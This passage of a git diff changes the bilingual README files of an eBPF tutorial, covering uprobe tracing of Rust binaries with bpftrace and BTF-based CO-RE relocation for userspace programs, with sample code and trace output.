install rustfilt +$ nm helloworld/target/release/helloworld > name.txt +$ rustfilt _ZN10helloworld4main17h2dce92cb81426b91E +helloworld::main +$ rustfilt -i name.txt | grep hello +0000000000008b60 t helloworld::main +``` + +接下来我们可以尝试使用 bpftrace 跟踪对应的函数: + +```console +$ sudo bpftrace -e 'uprobe:helloworld/target/release/helloworld:_ZN10helloworld4main17h2dce92cb81426b91E { printf("Function hello-world called\n"); }' +Attaching 1 probe... +Function hello-world called +``` + +## 一个奇怪的现象:多次调用、获取参数 + +对于一个更复杂的例子,包含多次调用和获取参数: + +```rust +use std::env; + +pub fn hello(i: i32, len: usize) -> i32 { + println!("Hello, world! {} in {}", i, len); + i + len as i32 +} + +fn main() { + let args: Vec = env::args().collect(); + + // Skip the first argument, which is the path to the binary, and iterate over the rest + for arg in args.iter().skip(1) { + match arg.parse::() { + Ok(i) => { + let ret = hello(i, args.len()); + println!("return value: {}", ret); + } + Err(_) => { + eprintln!("Error: Argument '{}' is not a valid integer", arg); + } + } + } +} +``` + +我们再次进行类似的操作,会发现一个奇怪的现象: + +```console +$ sudo bpftrace -e 'uprobe:args/target/release/helloworld:_ZN10helloworld4main17h2dce92cb81426b91E { printf("Function hello-world called\n"); }' +Attaching 1 probe... +Function hello-world called +``` + +这时候我们希望 hello 函数运行多次,但 bpftrace 中只输出了一次调用: + +```console +$ args/target/release/helloworld 1 2 3 4 +Hello, world! 1 in 5 +return value: 6 +Hello, world! 2 in 5 +return value: 7 +Hello, world! 3 in 5 +return value: 8 +Hello, world! 4 in 5 +return value: 9 +``` + +而且看起来 bpftrace 并不能正确获取参数: + +```console +$ sudo bpftrace -e 'uprobe:args/target/release/helloworld:_ZN10helloworld4main17h2dce92cb81426b91E { printf("Function hello-world called %d\n" +, arg0); }' +Attaching 1 probe... +Function hello-world called 63642464 +``` + +Uretprobe 捕捉到了第一次调用的返回值: + +```console +$ sudo bpftrace -e 'uretprobe:args/tar +get/release/helloworld:_ZN10helloworld4main17h2dce92 +cb81426b91E { printf("Function hello-world called %d +\n", retval); }' +Attaching 1 probe... +Function hello-world called 6 +``` + +这可能是由于 Rust 没有稳定的 ABI。 Rust,正如它迄今为止所存在的那样,保留了以任何它想要的方式对这些结构成员进行排序的权利。 因此,被调用者的编译版本可能会完全按照上面的方式对成员进行排序,而调用库的编程的编译版本可能会认为它实际上是这样布局的: + +TODO: 进一步分析(未完待续) + +## 参考资料 + +- diff --git a/src/37-uprobe-rust/README_en.md b/src/37-uprobe-rust/README_en.md deleted file mode 100644 index 991871b..0000000 --- a/src/37-uprobe-rust/README_en.md +++ /dev/null @@ -1,148 +0,0 @@ -# eBPF Practice: Tracing User Space Rust Applications with Uprobe - -eBPF, or Extended Berkeley Packet Filter, is a revolutionary technology in the Linux kernel that allows developers to run custom "micro-programs" in kernel mode, thus changing system behavior or collecting granular performance data without modifying the kernel code. - -This article discusses how to trace user space Rust applications with Uprobe and eBPF, including how to obtain symbol names and attach them, get function parameters, get return values, etc. This article is part of the eBPF developer tutorial, more detailed content can be found here: The source code is open source in the [GitHub repository](https://github.com/eunomia-bpf/bpf-developer-tutorial). - -## Uprobe - -Uprobe is a user space probe. Uprobe probes allow dynamic instrumentation in user space programs, with instrumentation locations including: function entry points, specific offsets, and function return points. When we define a Uprobe, the kernel creates a fast breakpoint instruction (the int3 instruction on x86 machines) at the attached instruction. When the program executes this instruction, the kernel triggers an event, the program falls into kernel mode, and the probe function is called in a callback manner. After the probe function is executed, it returns to user mode to continue executing subsequent instructions. - -Uprobe is useful for parsing traffic in user space that cannot be parsed by kernel probes, such as http2 traffic, https traffic, and can also analyze runtime program, business logic, etc. For more information about Uprobe, you can refer to: - -- [eBPF practice tutorial: Use Uprobe to capture plaintext SSL/TLS data from various libraries](../30-sslsniff/README.md) -- [eBPF practice tutorial: Use Uprobe to capture Golang coroutine switching](../31-goroutine/README.md) -- [eBPF practice tutorial: Use Uprobe to capture user space http2 traffic](../32-http2/README.md) - -Running Uprobe in kernel mode eBPF might also produce significant performance overhead, in which case you might consider using user space eBPF runtime, such as [bpftime](https://github.com/eunomia-bpf/bpftime). bpftime is a user-space eBPF runtime based on LLVM JIT/AOT. It can run eBPF Uprobe programs in user mode and is compatible with kernel mode eBPF. Because it avoids context switching between user and kernel modes, bpftime's Uprobe overheads are about 10 times less than the kernel's, and it also more easy to extend. - -## Rust - -Rust is an open-source systems programming language that focuses on safety, speed, and concurrency. It was developed by Graydon Hoare at the Mozilla Research Center in 2010 and released its first stable version in 2015. The design philosophy of Rust language is to provide the performance advantages of C++ while greatly reducing memory safety vulnerabilities. Rust is gradually popular in the field of systems programming, especially in applications that require high performance, security, and reliability, such as operating systems, file systems, game engines, network services, etc. Many large technology companies, including Mozilla, Google, Microsoft, and Amazon, are using or supporting the Rust language. - -You can refer to the [official Rust website](https://www.rust-lang.org/) for more information about Rust language and install the Rust toolchain. - -## Simplest example: Symbol name mangling - -Let's start with a simple example, tracing the `main` function of a Rust program with Uprobe, with the code as follows: - -```rust -pub fn hello() -> i32 { - println!("Hello, world!"); - 0 -} - -fn main() { - hello(); -} -``` - -Build and try to get the symbol: - -```console -$ cd helloworld -$ cargo build -$ nm helloworld/target/release/helloworld | grep hello -0000000000008940 t _ZN10helloworld4main17h2dce92cb81426b91E -``` - -We find that the corresponding symbol has been converted to `_ZN10helloworld4main17h2dce92cb81426b91E`. This is because rustc uses [Symbol name mangling](https://en.wikipedia.org/wiki/Name_mangling) to encode a unique name for the symbols used in the code generation process. The encoded name will be used by the linker to associate the name with the content it points to. The -C symbol-mangling-version option can be used to control the handling of symbol names. - -We can use the [`rustfilt`](https://crates.io/crates/rustfilt) tool to parse and obtain the corresponding symbol: - -```console -$ cargo install rustfilt -$ nm helloworld/target/release/helloworld > name.txt -$ rustfilt _ZN10helloworld4main17h2dce92cb81426b91E -helloworld::main -$ rustfilt -i name.txt | grep hello -0000000000008b60 t helloworld::main -``` - -Next we can try to use bpftrace to trace the corresponding function: - -```console -$ sudo bpftrace -e 'uprobe:helloworld/target/release/helloworld:_ZN10helloworld4main17h2dce92cb81426b91E { printf("Function hello-world called\n"); }' -Attaching 1 probe... -Function hello-world called -``` - -## A strange phenomenon: multiple calls, getting parameters - -For a more complex example, which includes multiple calls and parameter fetching: - -```rust -use std::env; - -pub fn hello(i: i32, len: usize) -> i32 { - println!("Hello, world! {} in {}", i, len); - i + len as i32 -} - -fn main() { - let args: Vec = env::args().collect(); - - // Skip the first argument, which is the path to the binary, and iterate over the rest - for arg in args.iter().skip(1) { - match arg.parse::() { - Ok(i) => { - let ret = hello(i, args.len()); - println!("return value: {}", ret); - } - Err(_) => { - eprintln!("Error: Argument '{}' is not a valid integer", arg); - } - } - } -} -``` - -We repeat a similar operation and notice a strange phenomenon: - -```console -$ sudo bpftrace -e 'uprobe:args/target/release/helloworld:_ZN10helloworld4main17h2dce92cb81426b91E { printf("Function hello-world called\n"); }' -Attaching 1 probe... -Function hello-world called -``` - -At this point we expect the hello function to run several times, but bpftrace only prints out one call: - -```console -$ args/target/release/helloworld 1 2 3 4 -Hello, world! 1 in 5 -return value: 6 -Hello, world! 2 in 5 -return value: 7 -Hello, world! 3 in 5 -return value: 8 -Hello, world! 4 in 5 -return value: 9 -``` - -And it appears that bpftrace cannot correctly get the parameter: - -```console -$ sudo bpftrace -e 'uprobe:args/target/release/helloworld:_ZN10helloworld4main17h2dce92cb81426b91E { printf("Function hello-world called %d\n" -, arg0); }' -Attaching 1 probe... -Function hello-world called 63642464 -``` - -The Uretprobe did catch the return value of the first call: - -```console -$ sudo bpftrace -e 'uretprobe:args/tar -get/release/helloworld:_ZN10helloworld4main17h2dce92 -cb81426b91E { printf("Function hello-world called %d -\n", retval); }' -Attaching 1 probe... -Function hello-world called 6 -``` - -This may due to Rust does not have a stable ABI. Rust, as it has existed so far, has reserved the right to order those struct members any way it wants. So the compiled version of the callee might order the members exactly as above, while the compiled version of the programming calling into the library might think its actually laid out like this: - -TODO: Further analysis (to be continued) - -## References - -- diff --git a/src/38-btf-uprobe/README.md b/src/38-btf-uprobe/README.md index b45b35e..aa1a0e6 100644 --- a/src/38-btf-uprobe/README.md +++ b/src/38-btf-uprobe/README.md @@ -1,43 +1,50 @@ -# 借助 eBPF 和 BTF,让用户态也能一次编译、到处运行 +# Expanding eBPF Compile Once, Run Everywhere(CO-RE) to Userspace Compatibility -在现代 Linux 系统中,eBPF(扩展的 Berkeley Packet Filter)是一项强大而灵活的技术。它允许在内核中运行沙盒化程序,类似于虚拟机环境,为扩展内核功能提供了一种既安全又不会导致系统崩溃或安全风险的方法。 +> Yusheng -eBPF 中的 “co-re” 代表“一次编译、到处运行”。这是其关键特征之一,用于解决 eBPF 程序在不同内核版本间兼容性的主要挑战。eBPF 的 CO-RE 功能可以实现在不同的内核版本上运行同一 eBPF 程序,而无需重新编译。 +eBPF, short for extended Berkeley Packet Filter, is a powerful and versatile technology used in modern Linux systems. It allows for the running of sandboxed programs in a virtual machine-like environment within the kernel, providing a safe way to extend the capabilities of the kernel without the risk of crashing the system or compromising security. -利用 eBPF 的 Uprobe 功能,可以追踪用户空间应用程序并访问其内部数据结构。然而,用户空间应用程序的 CO-RE 实践目前尚不完善。本文将介绍一种新方法,利用 CO-RE 为用户空间应用程序确保 eBPF 程序在不同应用版本间的兼容性,从而避免了多次编译的需求。例如,在从加密流量中捕获 SSL/TLS 明文数据时,你或许不需要为每个版本的 OpenSSL 维护一个单独的 eBPF 程序。 +Co-RE, standing for 'Compile Once, Run Everywhere', tackles the critical issue of eBPF program compatibility across diverse kernel versions. This feature allows eBPF programs to run on various kernel versions without the need for recompilation, simplifying deployment and maintenance. -为了在用户空间应用程序中实现eBPF的“一次编译、到处运行”(Co-RE)特性,我们需要利用BPF类型格式(BTF)来克服传统eBPF程序的一些限制。这种方法的关键在于为用户空间程序提供与内核类似的类型信息和兼容性支持,从而使得eBPF程序能够更灵活地应对不同版本的用户空间应用和库。 +With eBPF Uprobe, you can also trace userspace applications and access their internal data structures. However, the CO-RE is not designed for userspace applications. This blog will introduce how to leverage CO-RE for user-space applications, ensuring eBPF Uprobe programs remain compatible across different application versions without the need for multiple compilations. -本文是eBPF开发者教程的一部分,详细内容可访问[https://eunomia.dev/tutorials/](https://eunomia.dev/tutorials/)。本文完整的代码请查看 。 +This approach may be particularly beneficial for tracing applications like OpenSSL, where maintaining separate eBPF programs for each version is impractical. With userspace eBPF runtimes like bpftime, you can also expand the CO-RE to more usecases, including extensions, networking, and dynamic patching, providing versatile and efficient solutions. -## 为什么我们需要CO-RE? +To implement the Co-RE feature of eBPF in user-space applications, we also need to utilize the BPF Type Format (BTF) to overcome some of the limitations of traditional eBPF programs. The key to this approach lies in providing user-space programs with similar type information and compatibility support as the kernel, thereby enabling eBPF programs to more flexibly handle different versions of user-space applications and libraries. -- **内核依赖性**:传统的eBPF程序和它们被编译的特定Linux内核版本紧密耦合。这是因为它们依赖于内核的特定内部数据结构和API,这些可能在内核版本间变化。 -- **可移植性问题**:如果你想在带有不同内核版本的不同Linux系统上运行一个eBPF程序,你通常需要为每个内核版本重新编译eBPF程序,这是一个麻烦而低效的过程。 +This article is part of the eBPF Developer Tutorial, and for more detailed content, you can visit [https://eunomia.dev/tutorials/](https://eunomia.dev/tutorials/). The source code is available on the [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/38-btf-uprobe). -### Co-RE的解决方案 +## Why we need CO-RE? -- **抽象内核依赖性**:Co-RE使eBPF程序更具可移植性,通过使用BPF类型格式(BTF)和重定位来抽象特定的内核依赖。 -- **BPF类型格式(BTF)**:BTF提供了关于内核中数据结构和函数的丰富类型信息。这些元数据允许eBPF程序在运行时理解内核结构的布局。 -- **重定位**:编译支持Co-RE的eBPF程序包含在加载时解析的重定位。这些重定位根据运行内核的实际布局和地址调整程序对内核数据结构和函数的引用。 +- **Kernel Dependencies**: Traditional eBPF programs are tightly coupled with the specific Linux kernel version they are compiled for. This is because they rely on specific internal data structures and kernel APIs which can change between kernel versions. +- **Portability Issues**: If you wanted to run an eBPF program on different Linux systems with different kernel versions, you'd traditionally have to recompile the eBPF program for each kernel version, which is a cumbersome and inefficient process. -### Co-RE的优点 +### The Co-RE Solution -1. **编写一次,任何地方运行**:编译有Co-RE的eBPF程序可以在不同的内核版本上运行,无需重新编译。这大大简化了在多样环境中部署和维护eBPF程序。 -2. **安全和稳定**:Co-RE保持了eBPF的安全性,确保程序不会导致内核崩溃,遵守安全约束。 -3. **简单的开发**:开发者不需要关注每个内核版本的具体情况,这简化了eBPF程序的开发。 +- **Abstracting Kernel Dependencies**: Co-RE enables eBPF programs to be more portable by abstracting away specific kernel dependencies. This is achieved through the use of BPF Type Format (BTF) and relocations. +- **BPF Type Format (BTF)**: BTF provides rich type information about data structures and functions in the kernel. This metadata allows eBPF programs to understand the layout of kernel structures at runtime. +- **Relocations**: eBPF programs compiled with Co-RE support contain relocations that are resolved at load time. These relocations adjust the program's references to kernel data structures and functions according to the actual layout and addresses in the running kernel. -## 用户空间应用程序CO-RE的问题 +### Advantages of Co-RE -eBPF也支持追踪用户空间应用程序。Uprobe是一个用户空间探针,允许对用户空间程序进行动态仪表装置。探针位置包括函数入口、特定偏移和函数返回。 +1. **Write Once, Run Anywhere**: eBPF programs compiled with Co-RE can run on different kernel versions without the need for recompilation. This greatly simplifies the deployment and maintenance of eBPF programs in diverse environments. +2. **Safety and Stability**: Co-RE maintains the safety guarantees of eBPF, ensuring that programs do not crash the kernel and adhere to security constraints. +3. **Ease of Development**: Developers don't need to worry about the specifics of each kernel version, which simplifies the development of eBPF programs. -BTF是为内核设计的,生成自vmlinux,它可以帮助eBPF程序方便地兼容不同的内核版本。但是,用户空间应用程序也需要CO-RE。例如,SSL/TLS uprobe被广泛用于从加密流量中捕获明文数据。它是用用户空间库实现的,如OpenSSL、GnuTLS、NSS等。用户空间应用程序和库也有各种版本,如果我们需要为每个版本编译和维护eBPF程序,那就会很复杂。 +## Problem: userspace application CO-RE -下面是一些新的工具和方法,可以帮助我们为用户空间应用程序启用CO-RE。 +The eBPF also supports tracing userspace applications. Uprobe is a user-space probe that allows dynamic instrumentation in user-space programs. The probe locations include function entry, specific offsets, and function returns. -## 用户空间程序的BTF +The BTF is designed for the kernel and generated from vmlinux, it can help the eBPF program to be easily compatible with different kernel versions. + +The userspace application, however, also need CO-RE. For example, the SSL/TLS uprobe is widely used to capture the plaintext data from the encrypted traffic. It is implemented with the userspace library, such as OpenSSL, GnuTLS, NSS, etc. The userspace application and libraries also has different versions, it would be complex if we need to compile and maintain the eBPF program for each version. + +Let's see what will happen if CO-RE is not enabled for userspace applications, and how the BTF from userspace applications can solve this. + +## No BTF for userspace program + +This is a simple uprobe example, it can capture the function call and arguments of the `add_test` function in the userspace program. You can add `#define BPF_NO_PRESERVE_ACCESS_INDEX` in the `uprobe.bpf.c` to make sure the eBPF program can be compiled without BTF for `struct data`. -这是一个简单的uprobe例子,它可以捕获用户空间程序的`add_test`函数的调用和参数。你可以在`uprobe.bpf.c`中添加`#define BPF_NO_PRESERVE_ACCESS_INDEX`来确保eBPF程序可以在没有`struct data`的BTF的情况下编译。 ```c #define BPF_NO_GLOBAL_DATA @@ -65,9 +72,9 @@ int BPF_UPROBE(add_test, struct data *d) char LICENSE[] SEC("license") = "Dual BSD/GPL"; ``` -然后,我们有两个不同版本的用户空间程序,`examples/btf-base`和`examples/btf-base-new`。两个版本中的struct `data`是不同的。 +Then, we have two different versions of the userspace program, `examples/btf-base` and `examples/btf-base-new`. The struct `data` is different in the two versions. -`examples/btf-base`: +`examples/btf-base`: ```c // use a different struct @@ -88,7 +95,7 @@ int main(int argc, char **argv) { } ``` -`examples/btf-base-new`: +`examples/btf-base-new`: ```c struct data { @@ -109,57 +116,59 @@ int main(int argc, char **argv) { } ``` -我们可以使用pahole和clang来生成每个版本的btf。制作示例并生成btf: +We can use pahole and clang to generate the btf for each version of userspace applications. The pahole tool can simply generate BTF from the debug info: + +make examples and generate btf for them: ```sh make -C example # it's like: pahole --btf_encode_detached base.btf btf-base.o ``` -然后我们执行eBPF程序和用户空间程序。 对于 `btf-base`: +The we execute the eBPF program with the userspace program. for `btf-base`: ```sh sudo ./uprobe examples/btf-base ``` -也是用户空间程序: +And also the userspace program: ```console $ examples/btf-base add_test(&d) = 4 ``` -我们将看到: +We will see: ```console $ sudo cat /sys/kernel/debug/tracing/trace_pipe\ <...>-25458 [000] ...11 27694.081465: bpf_trace_printk: add_test(&d) 1 + 3 = 4 ``` -对于 `btf-base-new`: +For `btf-base-new`: ```sh sudo ./uprobe examples/btf-base-new ``` -同时也是用户空间程序: +And also the userspace program: ```console $ examples/btf-base-new add_test(&d) = 4 ``` -但我们可以看到: +But we will see: ```console $ sudo cat /sys/kernel/debug/tracing/trace_pipe\ <...>-25809 [001] ...11 27828.314224: bpf_trace_printk: add_test(&d) 1 + 2 = 3 ``` -结果是不同的,因为两个版本中的struct `data`是不同的。eBPF程序无法与不同版本的用户空间程序兼容,我们获取到了错误的结构体偏移量,也会导致我们追踪失败。 +The result is different, because the struct `data` is different in the two versions. The eBPF program can't be compatible with different versions of the userspace program, so we cannot get the correct information. -## 使用用户空间程序的BTF +## Use BTF for userspace program -在`uprobe.bpf.c`中注释掉`#define BPF_NO_PRESERVE_ACCESS_INDEX` ,以确保eBPF程序可以以`struct data`的BTF编译。 +Comment the `#define BPF_NO_PRESERVE_ACCESS_INDEX` in the `uprobe.bpf.c` to make sure the eBPF program can be compiled with BTF for `struct data`. ```c #define BPF_NO_GLOBAL_DATA @@ -182,6 +191,7 @@ struct data { #pragma clang attribute pop #endif + SEC("uprobe/examples/btf-base:add_test") int BPF_UPROBE(add_test, struct data *d) { @@ -195,15 +205,15 @@ int BPF_UPROBE(add_test, struct data *d) char LICENSE[] SEC("license") = "Dual BSD/GPL"; ``` -`struct data`的记录在eBPF程序中被保留下来。然后,我们可以使用 `btf-base.btf`来编译eBPF程序。 +The record of `struct data` is preserved in the eBPF program. Then, we can use the `btf-base.btf` to compile the eBPF program. -将用户btf与内核btf合并,这样我们就有了一个完整的内核和用户空间的btf: +Merge user btf with kernel btf, so we have a complete btf for the kernel and userspace: ```sh ./merge-btf /sys/kernel/btf/vmlinux examples/base.btf target-base.btf ``` -然后我们使用用户空间程序执行eBPF程序。 对于 `btf-base`: +Then we execute the eBPF program with the userspace program. for `btf-base`: ```console $ sudo ./uprobe examples/btf-base target-base.btf @@ -215,15 +225,16 @@ libbpf: prog 'add_test': relo #2: patched insn #11 (ALU/ALU64) imm 4 -> 4 ... ``` -执行用户空间程序并获取结果: +Execute the userspace program and get result: ```console $ sudo cat /sys/kernel/debug/tracing/trace_pipe [sudo] password for yunwei37: <...>-26740 [001] ...11 28180.156220: bpf_trace_printk: add_test(&d) 1 + 3 = 4 + ``` -还可以对另一个版本的用户空间程序`btf-base-new`做同样的操作: +Also, we do the same for another version of the userspace program `btf-base-new`: ```console $ ./merge-btf /sys/kernel/btf/vmlinux examples/base-new.btf target-base-new.btf @@ -245,7 +256,7 @@ libbpf: elf: symbol address match for 'add_test' in 'examples/btf-base-new': 0x1 Successfully started! Press Ctrl+C to stop. ``` -结果是正确的: +The result is correct: ```console $ sudo cat /sys/kernel/debug/tracing/trace_pipe @@ -253,46 +264,50 @@ $ sudo cat /sys/kernel/debug/tracing/trace_pipe <...>-26740 [001] ...11 28180.156220: bpf_trace_printk: add_test(&d) 1 + 3 = 4 ``` -我们的 eBPF 追踪程序也几乎不需要进行任何修改,只需要把包含 kernel 和用户态结构体偏移量的 BTF 加载进来即可。这和旧版本内核上没有 btf 信息的使用方式是一样的: +For complete source code, you can visit [https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/38-btf-uprobe](https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/38-btf-uprobe) for more details. + +The eBPF uprobe tracing program almost doesn't need any modifications. We just need to load the BTF containing the offsets of kernel and user-space structures. This is the same usage as enabling CO-RE on older kernel versions without BTF information: ```c - LIBBPF_OPTS(bpf_object_open_opts , opts, - ); - LIBBPF_OPTS(bpf_uprobe_opts, uprobe_opts); - if (argc != 3 && argc != 2) { - fprintf(stderr, "Usage: %s []\n", argv[0]); - return 1; - } - if (argc == 3) - opts.btf_custom_path = argv[2]; + LIBBPF_OPTS(bpf_object_open_opts , opts, + ); + LIBBPF_OPTS(bpf_uprobe_opts, uprobe_opts); + if (argc != 3 && argc != 2) { + fprintf(stderr, "Usage: %s []\n", argv[0]); + return 1; + } + if (argc == 3) + opts.btf_custom_path = argv[2]; - /* Set up libbpf errors and debug info callback */ - libbpf_set_print(libbpf_print_fn); + /* Set up libbpf errors and debug info callback */ + libbpf_set_print(libbpf_print_fn); - /* Cleaner handling of Ctrl-C */ - signal(SIGINT, sig_handler); - signal(SIGTERM, sig_handler); + /* Cleaner handling of Ctrl-C */ + signal(SIGINT, sig_handler); + signal(SIGTERM, sig_handler); - /* Load and verify BPF application */ - skel = uprobe_bpf__open_opts(&opts); - if (!skel) { - fprintf(stderr, "Failed to open and load BPF skeleton\n"); - return 1; - } + /* Load and verify BPF application */ + skel = uprobe_bpf__open_opts(&opts); + if (!skel) { + fprintf(stderr, "Failed to open and load BPF skeleton\n"); + return 1; + } ``` -实际上,btf 实现重定向需要两个部分,一个是 bpf 程序带的编译时的 btf 信息,一个是内核的 btf 信息。在实际加载 ebpf 程序的时候,libbpf 会根据当前内核上准确的 btf 信息,来修改可能存在错误的 ebpf 指令,确保在不同内核版本上能够兼容。 +In fact, the BTF implementation for relocation requires two parts: the compile-time BTF information carried by the BPF program, and the BTF information of the kernel when loading the eBPF program. When actually loading the eBPF program, libbpf will modify potentially incorrect eBPF instructions based on the accurate BTF information of the current kernel, ensuring compatibility across different kernel versions. -有趣的是,实际上 libbpf 并不区分这些 btf 信息来自用户态程序还是内核,因此我们只要把用户态的重定向信息一起提供给 libbpf 进行重定向,问题就解决了。 +Interestingly, libbpf does not differentiate whether these BTF information come from user-space programs or the kernel. Therefore, by merging the user-space BTF information with kernel BTF and provide them to libbpf, the problem is solved. -本文的工具和完整的代码在 开源。 +And also, since the relocation is happened in userspace loader(like libbpf), both kernel eBPF runtime and userspace eBPF runtimes(Such as bpftime) can benefit from the CO-RE. bpftime () is an open-source user-space eBPF runtime based on LLVM JIT/AOT. It enables the execution of eBPF programs in user space, compatible with kernel-space eBPF. While supporting uprobes, syscall trace, and general plugin extensions, it avoids the context switching between kernel and user spaces, thereby enhancing the execution efficiency of uprobe programs. With the support of libbpf and BTF, bpftime can also dynamically extend user-space applications, achieving compatibility across different versions of user-space programs. -## 结论 +For more details about BTF relocation, you may refer to -- **灵活性和兼容性**:在用户空间eBPF程序中使用 BTF 大大增强了它们在不同版本的用户空间应用程序和库之间的灵活性和兼容性。 -- **简化了复杂性**:这种方法显著减少了维护不同版本的用户空间应用程序的eBPF程序的复杂性,因为它消除了需要多个程序版本的需要。 -- **更广泛的应用**:这种方法在性能监控、安全和用户空间应用程序的调试等方面也可能能有更广泛的应用。bpftime(https://github.com/eunomia-bpf/bpftime) 是一个开源的基于 LLVM JIT/AOT 的用户态 eBPF 运行时,它可以在用户态运行 eBPF 程序,和内核态的 eBPF 兼容。它在支持 uprobe、syscall trace 和一般的插件扩展的同时,避免了内核态和用户态之间的上下文切换,从而提高了 uprobe 程序的执行效率。借助 libbpf 和 btf 的支持,bpftime 也可以更加动态的扩展用户态应用程序,实现在不同用户态程序版本之间的兼容性。 +## Conclusion -这个示例展示了 eBPF 在实践中可以将其强大的 CO-RE 功能扩展到更动态地处理用户空间应用的不同版本变化。 +- **Flexibility and Compatibility**: The use of BTF in user-space eBPF programs greatly enhances their flexibility and compatibility across different versions of user-space applications and libraries. +- **Reduced Complexity**: This approach significantly reduces the complexity involved in maintaining eBPF programs for different versions of user-space applications, as it eliminates the need for multiple program versions. +- **Potential for Broader Application**: While your example focused on SSL/TLS monitoring, this methodology may has broader applications in performance monitoring, security, and debugging of user-space applications. -如果你想了解更多关于eBPF知识和实践,你可以访问我们的教程代码库或者网站获得更多示例和完整教程。 +This example showcases a significant advancement in the practical application of eBPF, extending its powerful features to more dynamically handle user-space applications in a Linux environment. It's a compelling solution for software engineers and system administrators dealing with the complexities of modern Linux systems. + +If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository or website to get more examples and complete tutorials. diff --git a/src/38-btf-uprobe/README.zh.md b/src/38-btf-uprobe/README.zh.md new file mode 100644 index 0000000..b45b35e --- /dev/null +++ b/src/38-btf-uprobe/README.zh.md @@ -0,0 +1,298 @@ +# 借助 eBPF 和 BTF,让用户态也能一次编译、到处运行 + +在现代 Linux 系统中,eBPF(扩展的 Berkeley Packet Filter)是一项强大而灵活的技术。它允许在内核中运行沙盒化程序,类似于虚拟机环境,为扩展内核功能提供了一种既安全又不会导致系统崩溃或安全风险的方法。 + +eBPF 中的 “co-re” 代表“一次编译、到处运行”。这是其关键特征之一,用于解决 eBPF 程序在不同内核版本间兼容性的主要挑战。eBPF 的 CO-RE 功能可以实现在不同的内核版本上运行同一 eBPF 程序,而无需重新编译。 + +利用 eBPF 的 Uprobe 功能,可以追踪用户空间应用程序并访问其内部数据结构。然而,用户空间应用程序的 CO-RE 实践目前尚不完善。本文将介绍一种新方法,利用 CO-RE 为用户空间应用程序确保 eBPF 程序在不同应用版本间的兼容性,从而避免了多次编译的需求。例如,在从加密流量中捕获 SSL/TLS 明文数据时,你或许不需要为每个版本的 OpenSSL 维护一个单独的 eBPF 程序。 + +为了在用户空间应用程序中实现eBPF的“一次编译、到处运行”(Co-RE)特性,我们需要利用BPF类型格式(BTF)来克服传统eBPF程序的一些限制。这种方法的关键在于为用户空间程序提供与内核类似的类型信息和兼容性支持,从而使得eBPF程序能够更灵活地应对不同版本的用户空间应用和库。 + +本文是eBPF开发者教程的一部分,详细内容可访问[https://eunomia.dev/tutorials/](https://eunomia.dev/tutorials/)。本文完整的代码请查看 。 + +## 为什么我们需要CO-RE? + +- **内核依赖性**:传统的eBPF程序和它们被编译的特定Linux内核版本紧密耦合。这是因为它们依赖于内核的特定内部数据结构和API,这些可能在内核版本间变化。 +- **可移植性问题**:如果你想在带有不同内核版本的不同Linux系统上运行一个eBPF程序,你通常需要为每个内核版本重新编译eBPF程序,这是一个麻烦而低效的过程。 + +### Co-RE的解决方案 + +- **抽象内核依赖性**:Co-RE使eBPF程序更具可移植性,通过使用BPF类型格式(BTF)和重定位来抽象特定的内核依赖。 +- **BPF类型格式(BTF)**:BTF提供了关于内核中数据结构和函数的丰富类型信息。这些元数据允许eBPF程序在运行时理解内核结构的布局。 +- **重定位**:编译支持Co-RE的eBPF程序包含在加载时解析的重定位。这些重定位根据运行内核的实际布局和地址调整程序对内核数据结构和函数的引用。 + +### Co-RE的优点 + +1. **编写一次,任何地方运行**:编译有Co-RE的eBPF程序可以在不同的内核版本上运行,无需重新编译。这大大简化了在多样环境中部署和维护eBPF程序。 +2. **安全和稳定**:Co-RE保持了eBPF的安全性,确保程序不会导致内核崩溃,遵守安全约束。 +3. **简单的开发**:开发者不需要关注每个内核版本的具体情况,这简化了eBPF程序的开发。 + +## 用户空间应用程序CO-RE的问题 + +eBPF也支持追踪用户空间应用程序。Uprobe是一个用户空间探针,允许对用户空间程序进行动态仪表装置。探针位置包括函数入口、特定偏移和函数返回。 + +BTF是为内核设计的,生成自vmlinux,它可以帮助eBPF程序方便地兼容不同的内核版本。但是,用户空间应用程序也需要CO-RE。例如,SSL/TLS uprobe被广泛用于从加密流量中捕获明文数据。它是用用户空间库实现的,如OpenSSL、GnuTLS、NSS等。用户空间应用程序和库也有各种版本,如果我们需要为每个版本编译和维护eBPF程序,那就会很复杂。 + +下面是一些新的工具和方法,可以帮助我们为用户空间应用程序启用CO-RE。 + +## 用户空间程序的BTF + +这是一个简单的uprobe例子,它可以捕获用户空间程序的`add_test`函数的调用和参数。你可以在`uprobe.bpf.c`中添加`#define BPF_NO_PRESERVE_ACCESS_INDEX`来确保eBPF程序可以在没有`struct data`的BTF的情况下编译。 + +```c +#define BPF_NO_GLOBAL_DATA +#define BPF_NO_PRESERVE_ACCESS_INDEX +#include +#include +#include + +struct data { + int a; + int c; + int d; +}; + +SEC("uprobe/examples/btf-base:add_test") +int BPF_UPROBE(add_test, struct data *d) +{ + int a = 0, c = 0; + bpf_probe_read_user(&a, sizeof(a), &d->a); + bpf_probe_read_user(&c, sizeof(c), &d->c); + bpf_printk("add_test(&d) %d + %d = %d\n", a, c, a + c); + return a + c; +} + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; +``` + +然后,我们有两个不同版本的用户空间程序,`examples/btf-base`和`examples/btf-base-new`。两个版本中的struct `data`是不同的。 + +`examples/btf-base`: + +```c +// use a different struct +struct data { + int a; + int c; + int d; +}; + +int add_test(struct data *d) { + return d->a + d->c; +} + +int main(int argc, char **argv) { + struct data d = {1, 3, 4}; + printf("add_test(&d) = %d\n", add_test(&d)); + return 0; +} +``` + +`examples/btf-base-new`: + +```c +struct data { + int a; + int b; + int c; + int d; +}; + +int add_test(struct data *d) { + return d->a + d->c; +} + +int main(int argc, char **argv) { + struct data d = {1, 2, 3, 4}; + printf("add_test(&d) = %d\n", add_test(&d)); + return 0; +} +``` + +我们可以使用pahole和clang来生成每个版本的btf。制作示例并生成btf: + +```sh +make -C example # it's like: pahole --btf_encode_detached base.btf btf-base.o +``` + +然后我们执行eBPF程序和用户空间程序。 对于 `btf-base`: + +```sh +sudo ./uprobe examples/btf-base +``` + +也是用户空间程序: + +```console +$ examples/btf-base +add_test(&d) = 4 +``` + +我们将看到: + +```console +$ sudo cat 